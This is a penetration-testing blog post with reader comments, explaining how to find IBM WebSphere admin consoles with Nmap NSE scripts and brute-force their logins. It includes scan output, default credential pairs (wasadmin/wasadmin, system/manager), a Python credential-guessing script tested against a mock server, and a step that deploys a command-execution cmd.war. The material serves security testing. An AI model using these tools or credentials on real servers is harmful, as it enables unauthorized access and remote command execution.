Identifying and exploiting IBM WebSphere Application Server

IBM WebSphere Application Server (WAS) is a Java application server comparable to Tomcat, JBoss and WebLogic. It should therefore be of interest to any penetration tester doing enterprise-scale work, where WebSphere is likely to be present, and equally to anyone securing an enterprise environment, since the WebSphere administrative console allows deploying arbitrary (malicious or not) code to the server.

I have written NSE scripts to identify IBM WebSphere consoles and to brute force their usernames and passwords. I will also demonstrate the basics of WebSphere exploitation.

In order to identify WebSphere consoles you will need the NSE scripts available at https://github.com/kost/nmap-nse; you can clone the git repository with the following commands:

git clone https://github.com/kost/nmap-nse.git
cd nmap-nse/scripts

I have submitted the scripts for inclusion in Nmap, but until they are part of Nmap you will have to download them from the repository above. Once the NSE script is available, running Nmap with it is simple. A full port scan (-p-) is worthwhile: the administrative console listens on 9060/9043 by default, but as the example below shows it is often moved to other ports:

nmap -p- -sV -sT --script=./http-websphere-console.nse 172.17.0.1

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-07-13 05:49 CEST
Nmap scan report for 172.17.0.1
Host is up (0.000049s latency).
Not shown: 65525 closed ports
PORT STATE SERVICE VERSION
28000/tcp open http IBM Tivoli Enterprise Portal (Servlet 3.0)
28001/tcp open ssl/http IBM Tivoli Enterprise Portal (Servlet 3.0)
| http-websphere-console:
| consoles:
|_ WebSphere at /ibm/console/logon.jsp?action=OK
28002/tcp open giop CORBA naming service
28003/tcp open ssl/http IBM WebSphere Application Server 8.0
|_http-server-header: WebSphere Application Server/8.0
28006/tcp open ssl/giop CORBA naming service
28007/tcp open ssl/unknown
28008/tcp open giop CORBA naming service
28009/tcp open unknown
28010/tcp open ssl/unknown
28020/tcp open ssl/unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.13 seconds

As you can see from the port scan, the NSE script identified a WebSphere console on port 28001 at the URI /ibm/console/logon.jsp?action=OK. Note that Nmap's service detection labels that port as "IBM Tivoli Enterprise Portal" rather than WebSphere, so do not rely on the version banner alone; the script checks for the console logon page itself.

If you go to that URI, you will be greeted by the console's username and password prompt:

IBM WebSphere Console

As you can see, this is the standard IBM WebSphere Application Server console. So I have written another NSE script, http-websphere-console-brute.nse, which can help you guess the username and password. Usage is simple:

nmap -p28001 -sV -sT --script=./http-websphere-console-brute.nse --script-args 'userdb=users.txt,passdb=passwd.txt' 172.17.0.1

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-07-13 06:30 CEST
Nmap scan report for 172.17.0.1
Host is up (0.00011s latency).
PORT STATE SERVICE VERSION
28001/tcp open ssl/http IBM Tivoli Enterprise Portal (Servlet 3.0)
| http-websphere-console-brute:
| Accounts:
| wasadmin:wasadmin – Valid credentials
|_ Statistics: Performed 1 guesses in 1 seconds, average tps: 1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.76 seconds

As you can see, the NSE script guessed the IBM WebSphere credentials: username wasadmin with password wasadmin. Another good credential pair to try is username system with password manager.
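The following is an added example, not code from the nmap-nse repository: it reimplements, with only the Python standard library, the two checks that http-websphere-console.nse and http-websphere-console-brute.nse perform above, so you can see what "identified a console" and "valid credentials" mean in terms of HTTP. It assumes (this is not stated on this page) that the logon page at /ibm/console/logon.jsp?action=OK carries a Java EE form login posting j_username/j_password to /ibm/console/j_security_check, that a rejected login redirects back to logon.jsp and an accepted one redirects elsewhere. MockConsole is a constructed stand-in for a real server so the example runs offline; the wordlist is likewise constructed.

```python
"""Fingerprint a WebSphere admin console and test credentials against it.

Added example; paths and the redirect behaviour are assumptions, and
MockConsole is a constructed mock, not real WebSphere.
"""
import http.client
import ssl
import threading
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

CONSOLE_PATH = "/ibm/console/logon.jsp?action=OK"   # assumed logon page
LOGIN_PATH = "/ibm/console/j_security_check"        # assumed form-login target


def _connect(host, port, use_ssl, timeout):
    if use_ssl:
        # Consoles usually carry self-signed certificates; skip verification.
        return http.client.HTTPSConnection(
            host, port, timeout=timeout, context=ssl._create_unverified_context())
    return http.client.HTTPConnection(host, port, timeout=timeout)


def identify_console(host, port, use_ssl=False, timeout=5):
    """Return CONSOLE_PATH if host:port serves a WebSphere logon page, else None."""
    conn = _connect(host, port, use_ssl, timeout)
    try:
        conn.request("GET", CONSOLE_PATH)
        resp = conn.getresponse()
        status, body = resp.status, resp.read().decode("utf-8", "replace")
    finally:
        conn.close()
    # Require both form markers, not just a 200, so a catch-all page that
    # answers every path with 200 is not reported as a console.
    if status == 200 and "j_security_check" in body and "j_username" in body:
        return CONSOLE_PATH
    return None


def try_login(host, port, username, password, use_ssl=False, timeout=5):
    """POST one credential pair to the form login; True if it was accepted."""
    data = urllib.parse.urlencode({"j_username": username, "j_password": password})
    conn = _connect(host, port, use_ssl, timeout)
    try:
        conn.request("POST", LOGIN_PATH, body=data,
                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        resp = conn.getresponse()
        resp.read()
        status, location = resp.status, resp.getheader("Location", "")
    finally:
        conn.close()
    # Form login answers with a redirect either way; being bounced back to
    # the logon page means the pair was rejected (assumed behaviour).
    return status in (302, 303) and "logon.jsp" not in location


def guess_credentials(host, port, pairs, use_ssl=False):
    """Try each (username, password) pair in order and return those accepted."""
    return [(u, p) for u, p in pairs if try_login(host, port, u, p, use_ssl)]


class MockConsole(BaseHTTPRequestHandler):
    """Constructed mock of the console logon flow (not real WebSphere)."""
    VALID = {"wasadmin": "wasadmin"}

    def log_message(self, *args):  # keep the example's output quiet
        pass

    def do_GET(self):
        if self.path.startswith("/ibm/console/logon.jsp"):
            page = (b'<form method="POST" action="j_security_check">'
                    b'<input name="j_username"><input type="password" name="j_password">'
                    b'</form>')
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(page)
        else:
            self.send_response(404)
            self.end_headers()

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        fields = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = fields.get("j_username", [""])[0]
        pwd = fields.get("j_password", [""])[0]
        accepted = self.VALID.get(user) == pwd
        self.send_response(302)
        self.send_header("Location", "/ibm/console/secure/" if accepted
                         else "/ibm/console/logon.jsp?error=true")
        self.end_headers()


def start_mock():
    """Start MockConsole on an ephemeral localhost port; caller must shutdown()."""
    srv = HTTPServer(("127.0.0.1", 0), MockConsole)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    srv = start_mock()
    host, port = srv.server_address
    print("console:", identify_console(host, port))
    wordlist = [("system", "manager"), ("admin", "admin"), ("wasadmin", "wasadmin")]
    print("valid:", guess_credentials(host, port, wordlist))
    srv.shutdown()
```

Against a real target, first confirm with one known-bad pair that a rejection really comes back as a redirect to logon.jsp; if the server answers differently, adjust the success test in try_login before trusting any "valid" result, otherwise every guess will be reported as accepted.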

After successful username/password guess you can login to the console:

IBM WebSphere Console Login

After a successful login to the console you can configure the application server and install and deploy applications. For an attacker that usually means deploying cmd.war, a web archive whose JSP runs the operating system command passed to it in a request parameter; the console's install wizard asks for a context root, and that is where the application will be reachable afterwards. Keep in mind that such commands run with the privileges of the operating system account under which the WebSphere process runs, which is why console credentials deserve the same protection as an OS administrator account:

Deploy cmd.war in IBM Websphere Console

The next step would be going to the cmd.war application URL and executing operating system commands. But I guess you know how to go from here: it is simple and the same as with any other application server.

References and further links

GitHub page:
https://github.com/kost/nmap-nse

Nmap-dev post:
http://seclists.org/nmap-dev/2015/q3/73

In this blog post I have demonstrated the basics of WebSphere exploitation. After this, I think you're ready to explore the following URLs:

http://erpscan.com/wp-content/uploads/pub/Penetration%20from%20application%20down%20to%20OS%20(IBM%20Websphere).pdf

http://www.securitytube.net/video/3298

Good luck with your IBM WebSphere adventures!


4 Responses to Identifying and exploiting IBM WebSphere Application Server

  1. You definitely should include a default username/password list. IBM uses WAS as a base for several solutions, which by default have several distinctively named (wpsbind, wpsadmin, etc) administrative account names.

    Also, brute force searching for web application context roots might be worthwhile. You might find one servlet or something similar that might not require authentication to function. The search space is somewhat large, but that’s something you could happily brute force slow and somewhat quiet for months…

    AFAIK WAS was originally based on Apache Geronimo, but IBM has apparently stopped supporting the project a few years ago.

    • Josh says:

      I agree on the first point. A list of common WebSphere credentials would be handy to include. I looked through the GitHub repository and couldn't find it.

    • k0st says:

      Hello and thanks for your comment. If you already have some kind of list to start it, you’re more than welcome to send it over to me. Proper credits will be given, of course 😉
      Same with context roots.

      Anyway, this is an introductory post on WebSphere. I hope I will have time to build on this in the future (as time allows) in order to provide more tips about checking the security of WAS.
